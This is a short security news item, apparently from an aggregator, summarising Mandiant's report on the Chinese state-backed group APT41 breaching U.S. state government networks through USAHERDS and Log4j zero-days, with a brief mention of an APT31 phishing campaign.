Security News > 2022 > March > Chinese APT41 Hackers Broke into at Least 6 U.S. State Governments: Mandiant

APT41, the state-sponsored threat actor affiliated with China, breached at least six U.S. state government networks between May 2021 and February 2022 by retooling its attack vectors to take advantage of vulnerable internet-facing web applications.

The exploited vulnerabilities included "a zero-day vulnerability in the USAHERDS application as well as the now infamous zero-day in Log4j," researchers from Mandiant said in a report published Tuesday, calling it a "Deliberate campaign."

The latest disclosure continues the trend of APT41 quickly co-opting newly disclosed vulnerabilities such as Log4Shell to gain initial access into target networks of two U.S. state governments alongside insurance and telecom firms within hours of it becoming public knowledge.

The intrusions continued well into February 2022 when the hacking crew re-compromised two U.S. state government victims that were infiltrated for the first time in May and June 2021, "Demonstrating their unceasing desire to access state government networks," the researchers said.

APT41's cyber operations against healthcare, high-tech, and telecommunications sectors over the years have since caught the attention of the U.S. Justice Department, which issued charges against five members of the group in 2020, landing the hackers a place on the FBI's cyber most wanted list.

In a related development, Google's Threat Analysis Group said it took steps to block a phishing campaign staged by another Chinese state-backed group tracked as APT31 last month that was aimed at "High profile Gmail users affiliated with the U.S. government."

News URL

https://thehackernews.com/2022/03/chinese-apt41-hackers-broke-into-at.html